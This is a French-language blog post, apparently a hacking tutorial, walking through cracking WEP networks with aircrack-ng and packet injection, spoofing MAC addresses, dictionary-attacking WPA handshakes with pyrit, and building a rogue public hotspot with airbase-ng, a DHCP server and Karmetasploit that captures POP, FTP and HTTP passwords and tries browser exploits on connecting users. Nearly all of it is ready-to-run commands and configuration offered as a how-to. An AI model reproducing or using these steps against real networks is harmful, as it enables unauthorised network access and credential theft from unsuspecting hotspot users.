WIFI

1. Cracker un réseau WEP

Aircrack est la suite qui permet de craquer les réseaux Wi-Fi.

Installation sous Debian de aircrack-ng :

udo apt install aircrack-ng

a. Capturer des paquets

Afin de cracker la clé WEP, on va devoir capturer suffisamment de paquets.

Pour connaître le nom de votre interface, utilisons la commande ifconfig :

airodump-ng --write capture1 wlan0

Airodump vous permet de capturer les paquets Wi-Fi.

Afin d’optimiser au maximum la capture, on peut spécifier un canal, via l’option –channel, l’adresse MAC de la borne Wi-Fi : –bssid.

b. Générer du trafic

Pour cracker la clé, il faut énormément de paquets, 400 000 au moins pour une WEP 64 et 1 200 000 au moins pour une WEP 128. S’il n’y a personne sur le réseau, cela peut prendre des semaines.

On va devoir injecter du trafic pour arriver à récupéré assez de requete (cette opération est optionnelle, mais permet d’accélérer le process s’il n’y a pas ou très peu de trafic).

Votre carte doit donc accepter le mode injection, vous pouvez voir la liste de compatibilité sur le site d’aircrack : http://www.aircrack-ng.org

Aireplay permet d’effectuer plusieurs attaques :

  • -0 : désauthentification, déconnecte les clients
  • -1 : fausse authentification
  • -2 : réinjection de paquet
  • -3 : injection de requête ARP
  • -4 : attaque ChopChop
  • -5 : attaque par fragmentation
  • -6 : Caffe Latte
  • -7 : Cfrag
  • -z : PTW attack

Dans un premier temps, on va générer une fausse authentification :

aireplay-ng -1 0 -e ACISSI -a 00:11:22:33:44:55 -h 00:00:00:00:00:01 wlan0

 On va générer une attaque de type injection de requête ARP :

aireplay-ng -3 -e ACISSI -b 00:11:22:33:44:55 -h 00:00:00:00:00:01 wlan0

Dès qu’Aireplay injectera des paquets, on va pouvoir voir une nette augmentation dans Airodump.

c. Trouver la clé

 Lançons Aircrack via la commande :

aircrack-ng capture1.cap

Si Aircrack ne trouve pas la clé, il faut capturer plus de paquets puis relancer Aircrack.

Si le filtrage MAC est activé, il suffit d’installer macchanger, via la commande :

apt-get install macchanger

Pour changer votre adresse MAC :

macchanger -m 00:00:00:00:00:01 wlan0

https://github.com/Zeckers/LeDicoDuGreyHat/blob/master/Programme/MacChanger/MacChanger.py

Vous pouvez aussi utilisé mon programme en python qui change aléatoirement votre adresse MAC

2. Cracker un réseau WPA

Avant de vous expliquer comment tout cela marche voici un outils qui permet de faire toutes les étapes que je vais vous présenter automatiquement :

https://github.com/v1s1t0r1sh3r3/airgeddon

Le crack WPA est bien moins avancé que le WEP. Cependant, il est possible de casser un mot de passe en utilisant un dictionnaire.

Nous allons utiliser pyrit, un programme en Python qui a le mérite de pouvoir être utilisé en cluster et permet aussi d’utiliser la puissance des GPU.

Téléchargeons les sources de pyrit via svn :

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

Puis les outils pour la compilation :

sudo apt-get install libssl-dev python python-dev

Compilons et installons pyrit :

python setup.py build 
sudo python setup.py install

Nous allons commencer par importer la liste de clés candidates dans une base de données pyrit :

pyrit -i dict.gz import_passwords

Nous allons maintenant importer les différents ESSID, par exemple l’ESSID linksys :

pyrit -e linksys create_essid

La commande suivante combine les mots de passe avec les différents ESSID afin de générer des PMK candidats :

pyrit batch

Cette procédure est la plus longue, en effet elle génère les différents PMK par produit cartésien (clé, ESSID).

Procédons à une capture avec airodump afin de récupérer un fichier .cap :

airodump-ng --write wpapskcapture.cap wlan0.

Il ne reste plus qu’à cracker :

pyrit -r wpapskcapture.cap attack_db

Il est aussi possible d’utiliser uniquement airodump et de capturer le handshake et ensuite de lancer un logiciel de cassage de mot de passe dessus sans utiliser pyrit.

3. Rogue AP

a. Introduction au Rogue AP

S’il est complexe de cracker une clé WPA, il est déjà bien plus simple de profiter de la nouvelle vague de rogue Access Point afin d’en créer un.

Les AP sont des routeurs Wi-Fi permettant aux utilisateurs de disposer d’une connexion Internet. On les trouve donc partout, dans la plupart des fastfoods, les universités, les parcs et autres. Ce sont des wifi publics.

Un AP n’a pas de clé WEP ou WPA et la majorité des utilisateurs tentent de s’y connecter pour accéder à Internet gratuitement.

Les rogues AP sont donc des faux « routeurs Wi-Fi », en général hotspot, qui récupéreront un maximum de mots de passe et si possible tenteront d’installer une backdoor sur les ordinateurs.

Comme il est possible de voir les clients connectés via la suite aicrack mais aussi d’authentifier un client, il est possible de les rediriger vers le Rogue AP.

b. Mise en pratique d’un Rogue AP avec Karmetasploit

Nous avons dans un premier temps besoin d’installer un serveur DHCP qui permettra de configurer automatiquement les IP des clients comme un vrai routeur Wi-Fi.

apt-get install dhcp3-server

Voici la configuration du serveur DHCP : /etc/dhcp3/dhcpd.conf

     option T150 code 150 = string; 
     deny client-updates; 
     one-lease-per-client false; 
     allow bootp; 
     ddns-updates off; 
     ddns-update-style interim; 
     authoritative; 
 
     subnet 10.0.0.0 netmask 255.255.255.0 { 
     interface at0; 
     range 10.0.0.100 10.0.0.254; 
     option routers 10.0.0.1; 
     option subnet-mask 255.255.255.0; 
     option domain-name-servers 10.0.0.1; 
     allow unknown-clients; 
     }

On passe l’interface Wi-Fi en mode moniteur :

airmon-ng start wlan0

Nous allons maintenant créer le hotspot :

airbase-ng -P -C 30 -e "Hotspot WiFi" -v mon0

-e est l’ESSID du réseau, il est possible de personnaliser le canal Wi-Fi, et même l’adresse MAC de l’AP.

Il faut maintenant configurer une adresse IP fixe pour notre AP.

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

Nous pouvons dès à présent démarrer le serveur DHCP.

/etc/init.d/dhcp3-server restart

Nous avons jusqu’ici créé un AP fonctionnel qui permet de surfer sur le Net. Nous allons maintenant créer la partie rogue.

Pour ce faire, nous allons utiliser Karmetasploit qui est en fait l’association de Karma et Metasploit.

Récupérons la dernière version de Metasploit via la commande :

svn co http://metasploit.com/svn/framework3/trunk msf3

Téléchargeons karma.rc.

wget http://digitaloffense.net/tools/karma.rc

Il ne reste plus qu’à lancer Karmetasploit :

./msfconsole -r karma.rc

Utilisons un de vos PC pour vous connecter sur votre Rogue AP. Une fois connecté, allez sur internet.

La Rogue AP dans cette configuration cherchera à infecter votre machine via autoPWN, un serveur HTTP qui va tenter un exploit sur votre navigateur Web. Karmetasploit est aussi configuré pour récupérer les mots de passe POP, FTP, HTTP.

Tout ce qui se passe est enregistré dans un fichier cap, analysable par la suite via Wireshark, mais aussi dans la base de données SQLite karma.db.

3. Autre Rogue AP :

WIFI-PUMPKIN : LE MEILLEUR OUTIL DE ROGUE AP

Un commentaire

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s